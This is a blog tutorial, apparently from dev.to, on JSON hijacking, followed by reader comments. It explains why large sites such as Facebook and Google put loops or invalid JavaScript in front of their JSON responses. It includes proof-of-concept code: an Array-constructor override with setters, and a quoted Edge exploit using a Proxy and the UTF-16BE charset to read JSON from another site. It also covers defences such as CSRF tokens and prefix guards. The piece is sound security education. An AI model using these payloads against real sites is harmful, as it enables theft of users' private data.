Why Facebook's API starts with a for loop
Antony Garand Nov 13 Updated on Nov 15, 2018
If you have ever inspected your requests to big companies' APIs in the browser, you might have noticed some weird JavaScript, such as a for loop, before the JSON itself.
Why would they waste a few bytes to invalidate this JSON?
To protect your data
Without those important bytes, it could be possible for any website to access this data.
This vulnerability is called JSON hijacking, and it allows websites to extract the JSON data from those APIs.
Origins
In JavaScript 1.5 and earlier versions, it was possible to override the constructor of a built-in object such as Array, and have this overridden version called when using bracket notation.
This means you could do:
function Array(){
alert('You created an array!');
}
var x = [1,2,3];
And the alert would pop up!
Replace the var x with the following script, and the attacker could read your emails!
This works by overwriting the Array constructor before loading an external script.
<script src="https://gmail.com/messages"></script>
Data extraction
Even though you're overriding the constructor, the array is still constructed and you can still access it via this.
Here is a snippet which will alert all of the array data:
function Array() {
var that = this;
var index = 0;
// Populating the array with setters, which dump the value when called
var valueExtractor = function(value) {
// Alert the value
alert(value);
// Set the next index to use this method as well
that.__defineSetter__(index.toString(),valueExtractor );
index++;
};
// Set the setter for item 0
that.__defineSetter__(index.toString(),valueExtractor );
index++;
}
Upon creating arrays, their values will be alerted!
This was fixed in the ECMAScript 4 proposal: literals no longer invoke an overridden constructor for built-ins such as Object and Array.
Even though ES4 was never released, this vulnerability was fixed by major browsers soon after its discovery.
You can still get similar behavior in today's JavaScript, but it is limited to variables you create yourself, or to items created without the bracket notation.
This would be the adapted version of the previous payload:
// Making an array
const x = [];
// Making the overridden methods
x.copy = [];
const extractor = (v) => {
// Keeping the value in a different array
x.copy.push(v);
// Setting the extractor for the next value
const currentIndex = x.copy.length;
x.__defineSetter__(currentIndex, extractor);
x.__defineGetter__(currentIndex, ()=>x.copy[currentIndex]);
// Logging the value
console.log('Extracted value', v);
};
// Assigning the setter on index 0
x.__defineSetter__(0, extractor);
x.__defineGetter__(0, ()=>x.copy[0]);
// Using the array as usual
x[0] = 'zero';
x[1] = 'one';
console.log(x[0]);
console.log(x[1]);
And this would be a version using the Array keyword to create your array:
function Array(){
console.log(arguments);
}
Array("secret","values");
As you can see, the data you added to the array was logged, while the functionality remains the same!
The fix was not to block the creation of a function named Array, but to force the bracket notation to use the native implementation instead of your custom function.
This means we can still create an Array function, but it won't be used with square brackets ([1,2,3]).
It will still be called if we use the x = new Array(1,2,3) or x = Array(1,2,3) notation, but this doesn't help us with JSON hijacking.
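A minimal sketch of that distinction, runnable in a current engine such as Node.js. The local Array function below is a stand-in for an attacker's override; it shadows the built-in only inside demo, and both names are made up for this illustration:

```javascript
function demo() {
  const calls = [];

  // Stand-in for an attacker-controlled override (hypothetical).
  function Array(...args) {
    calls.push(args);
  }

  // Bracket notation uses the native implementation, so the override is not called.
  const literal = [1, 2, 3];

  // An explicit call still reaches the override.
  Array("secret", "values");

  return {
    calls,
    literalIsNativeArray: globalThis.Array.isArray(literal),
  };
}

const result = demo();
console.log(result.calls.length);         // 1
console.log(result.literalIsNativeArray); // true
```

Only the explicit call is recorded. A JSON response is made of literals, which is why the override no longer sees its contents.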
Modern variations
Alright, so we know old versions of browsers were vulnerable a while ago.
What does this mean for us today?
Well, with the recent release of ECMAScript 6, juicy new features such as Proxies were added!
Gareth Heyes from PortSwigger blogged about a modern variation of this attack, which still lets us steal data from JSON endpoints!
Using Proxies instead of Accessors lets us steal any variable created, no matter what its name is.
It can behave like an accessor but for any accessed or written property.
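To illustrate the difference from per-property accessors, here is a small sketch of a Proxy that observes reads, writes and `in` checks for property names it was never told about. The seen log and the spy object are names made up for this example:

```javascript
const seen = [];

const spy = new Proxy({}, {
  // Called for every property read, whatever the name.
  get(target, name) {
    seen.push(`get ${String(name)}`);
    return target[name];
  },
  // Called for every property write.
  set(target, name, value) {
    seen.push(`set ${String(name)}`);
    target[name] = value;
    return true;
  },
  // Called for every `name in spy` check.
  has(target, name) {
    seen.push(`has ${String(name)}`);
    return name in target;
  },
});

spy.anything = "secret";
const value = spy.anything;
const present = "whatever" in spy;

console.log(seen); // [ 'set anything', 'get anything', 'has whatever' ]
```

With `__defineSetter__` each index had to be registered in advance; here a single handler covers every name.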
Using this and another quirk, it is possible to steal data once again!
UTF-16BE is a multi-byte charset and so two bytes will actually form one character. If for example your script starts with [" this will be treated as the character 0x5b22 not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going?
Using such a script:
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
With a bit of controlled data from this script, as well as the practical bit-shifting script to make this legible again, we can exfiltrate data once again!
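The charset trick and the bit-shifting step can be tried in isolation. This is only a sketch of the byte arithmetic, not of the attack itself: toUtf16BeView simulates how a browser would pair up bytes when told the script is UTF-16BE, and recoverBytes applies the same shift-and-mask that appears in the PoC. Both function names are invented for this example.

```javascript
// Simulate reading single-byte text as UTF-16BE: every two bytes become one character.
function toUtf16BeView(ascii) {
  let out = "";
  for (let i = 0; i + 1 < ascii.length; i += 2) {
    out += String.fromCharCode((ascii.charCodeAt(i) << 8) | ascii.charCodeAt(i + 1));
  }
  return out;
}

// Undo the pairing: split each 16-bit character back into its two bytes.
function recoverBytes(name) {
  return name.replace(/./g, (c) => {
    const code = c.charCodeAt(0);
    return String.fromCharCode(code >> 8, code & 0xff);
  });
}

const original = '["supersecret"';
const misread = toUtf16BeView(original);

console.log(misread.charCodeAt(0).toString(16)); // 5b22
console.log(recoverBytes(misread));              // ["supersecret"
```

The first two bytes, 0x5b and 0x22, collapse into the single character 0x5b22 mentioned in the quote, and the shift-and-mask turns the resulting identifier back into readable text.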
Here is his final Edge PoC, taken from his blog post:
<!doctype HTML>
<script>
Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
has:function(target,name){
alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
}
}));
</script>
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
<!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] -->
As I won't explain his method in depth, I strongly suggest you read his post for more information.
Prevention
Here are the official OWASP recommendations, taken from their AJAX security cheat sheet:
Use CSRF Protection
This prevents the exploit by not returning the data if a security header or CSRF token is not present.
Always return JSON with an Object on the outside
This last solution is interesting.
In Firefox and IE, for some reason, this is valid:
x = [{"key":"value"}]
x = {"key":"value"}
[{"key":"value"}]
{key: "value"}
But this isn't:
{"key":"value"}
The reason it is not valid is that Firefox and IE consider the braces to be the start of a block statement, and not an object creation.
The notation without quotes, {key: "value"}, is considered a label, with the value being a statement.
Chrome's console, unlike the others, treats those inputs as an object creation, and therefore it creates a new object.
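The block-versus-object distinction can be checked outside a browser console. The sketch below asks the engine to parse each snippet as statements, using `new Function` purely as a parser (the function is never called). parsesAsStatements is a name made up for this example, and it assumes an environment where `new Function` is permitted, such as Node.js:

```javascript
// Returns true when the source parses as a sequence of statements.
function parsesAsStatements(source) {
  try {
    new Function(source); // parsed, never executed
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

console.log(parsesAsStatements('x = {"key":"value"}'));           // true
console.log(parsesAsStatements('[{"key":"value"}]'));             // true
console.log(parsesAsStatements('{key: "value"}'));                // true, a label inside a block
console.log(parsesAsStatements('{"key":"value"}'));               // false
console.log(parsesAsStatements("{key:'value', keytwo:'value2'}")); // false
console.log(parsesAsStatements('({"key":"value"})'));             // true, parentheses force an expression
```

A bare object at the top level is therefore a syntax error when loaded as a script, which is what makes "an Object on the outside" a useful defense.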
Thanks Matt (r0x33d) for the help demystifying this!
Matt (@r0x33d), to @jon_bottarini @AntoGarand @MarcS0h: "As for {key:'value'} - this is processed as Labelled Block Statement. You can confirm that by writing {key:'value', keytwo:'value2'} into console, this won't work." (06:15 AM - 13 Nov 2018)
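Going back to the first recommendation, here is a rough sketch of a server-side check that refuses to return JSON unless the request carries the expected token in a custom header. A script tag include cannot set custom request headers, which is why such a check stops the attack. The header name x-csrf-token, the function respondWithJson and the way the token is passed in are assumptions for illustration, not part of the OWASP text:

```javascript
const CSRF_HEADER = "x-csrf-token"; // hypothetical header name

// headers: plain object with lowercase header names (an assumption of this sketch).
function respondWithJson(headers, sessionToken, payload) {
  const sent = headers[CSRF_HEADER];
  // Simplified comparison; a production check would compare in constant time.
  if (typeof sent !== "string" || sent.length === 0 || sent !== sessionToken) {
    return { status: 403, body: "" };
  }
  return { status: 200, body: JSON.stringify(payload) };
}

const secret = { messages: ["hello"] };
const denied = respondWithJson({}, "token-123", secret);
const allowed = respondWithJson({ "x-csrf-token": "token-123" }, "token-123", secret);

console.log(denied.status, allowed.status); // 403 200
```

The request without the header gets an empty 403 response, so there is no JSON for a hostile page to capture.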
Conclusion
While those vectors may not be working today, we never know what new bug tomorrow will bring, and therefore we should still do our best to prevent APIs from being exploitable.
If we had taken this Stack Overflow answer for granted, we would have been vulnerable to the modern variants, and therefore still possibly hacked.
Google and Facebook's answer has been to add invalid JavaScript or infinite loops before their JSON data, but there are a few other alternatives, as listed by OWASP.
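The prefix approach can be sketched in a few lines. The server prepends something that is not valid JSON and that, when run as a script, never reaches the data; the legitimate client fetches the response as text and removes the prefix before parsing. The function names are illustrative, and for (;;); is used as the guard because it matches the loop this article is named after:

```javascript
const GUARD = "for (;;);";

// Server side: prepend the guard to the serialized payload.
function guardJson(payload) {
  return GUARD + JSON.stringify(payload);
}

// Client side: the response is read as text, so the guard can be cut off before parsing.
function parseGuardedJson(text) {
  if (!text.startsWith(GUARD)) {
    throw new Error("Missing JSON guard prefix");
  }
  return JSON.parse(text.slice(GUARD.length));
}

const wire = guardJson({ messages: ["hello"] });
console.log(wire);                               // for (;;);{"messages":["hello"]}
console.log(parseGuardedJson(wire).messages[0]); // hello
```

A page that pulls the same URL in through a script tag never gets the text, only an endless loop.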
References:
Haacked.com - JSON Hijacking
Stack Overflow - Why does Google prepend [a loop] to their JSON responses
PortSwigger - JSON hijacking for the modern web
And the slides of Gareth Heyes
This is incredibly illuminating. Thank you so much for this Antony!
Replace var x with an HTML script tag? But how?
In your webpage, you would do the following:
This way you overload the constructor before loading the messages themselves.
Ah ok, I see.
I think the way it is written in the article is confusing. It should instead say "override the Array constructor before loading external scripts"
Thanks for the feedback, updated the post so it's more clear
Wow you're fast!
If you are going to put links on your article please drop the condescending lmddgtfy.com idiocy...that's just lackadaisical and boorish to readers. The point of an article's links are to support the content it talks about, not insult readers by demonstrating a lack of effort on your part. I would expect this behavior when someone asks a simple question on a chat forum or the YouTube comments area but a dev.to article, REALLY?
So, after writing up a full article, including a reference section and links through the post, having a link towards a search result page is a "lack of effort on my part" and an "insult to the readers"?
That's my writing style and if you don't like it, you're free to not read it or not click on the links, especially since there should be a link preview on the bottom left corner of your browser.
Finally, considering this article has over 65k views and you're the only negative comment, I would consider you to be the exception.
Hope you enjoyed the article, but please provide your comments in a more constructive manner next time I include a lmddgtfy.net link!
I'm sorry if you consider my comment "negative" that was not the intention, it was a trivial request. The lmddgtfy link just came off really condescending to me so I over reacted, apologies for that. I instantly close any links that go to let me search that for you sites as the lmgtfy.com website has a nice little "That wasn't so hard was it?" message right before it clicks search. After being insulted by this many times I had assumed that the duck duck go version did the same thing and closed the page before it even clicked search.
"please provide your comments in a more constructive manner next time I include a lmddgtfy.net link!"
Ok, instead of providing a lmddgtfy link with a lengthy 5 second animation suggesting that the reader lacks the brain power to search themselves. Just do a direct link to the search result like so duckduckgo.com/?q=JSON+hijacking, it's faster and more direct.
Although if someone is interested in the topic they will search for it themselves, it seems a little redundant to open a search result for an article. Try linking in other interesting reads related to the topic, maybe even some dev.to ones. Hope that's constructive enough for you. :)
I did love the article though!
I'm really wondering how any of these attack techniques would fare against simpler CSRF techniques like double-submitted cookies.
Other stupid ways that seem like they could mitigate this would be to just make all the JSON endpoints require a POST, or to use a different method of encoding data that can't be interpreted as valid Javascript at all (XML?)
Making them all POST wouldn't be semantic (POST means you're changing something on the server). JSON is the standard API data format now, and it's much better than XML in my opinion.
The ultimate way to prevent these attacks is to not allow user submitted input to end up anywhere in output unescaped so attackers' scripts are never able to be injected.
I can see how adding an infinite for-loop at the start of the JSON response would prevent it from being executed as JavaScript. How does the original site access the data? Does it need to use a function to discard the first X bytes of every response before loading the JSON? Or is there something I'm missing?
This is exactly it!
As they load the string version of the JSON, they can remove their JS breaking mechanism before parsing it
If you have some js on your site, that can modify your constructor, you already hijacked, isn't it?
This attack is used to steal data from another website.
Say you're on dev.to, you don't want dev.to to access your emails!
But dev.to can still execute their own scripts, which makes sense.
Pardon my noob but shouldn't it be fixed with CORS instead?
CORS wouldn't work on old browsers, and CORS is also used on the source site to limit what can be accessed from this website.
What is happening here is the opposite: an attacking website wants to access information from another one.
Also note that this vulnerability is over 10 years old, well older than CORS :)
I did something similar, but I used location.href=... to redirect to the site from which the data was supposed to be used.
Nice piece and good use of the notation to illuminate the point.
Look forward to seeing more from you!
Amazing, I knew some of those individually however this extremely helpful post is like a complete paper with references, so I can bookmark this, thank you Antony!
Great post! Very insightful
Great article. Small typo. Agaim!
Thanks, just fixed it!
So just use Protocol Buffers in your API response.
Awesome post Antony! I always wondered about the for loop.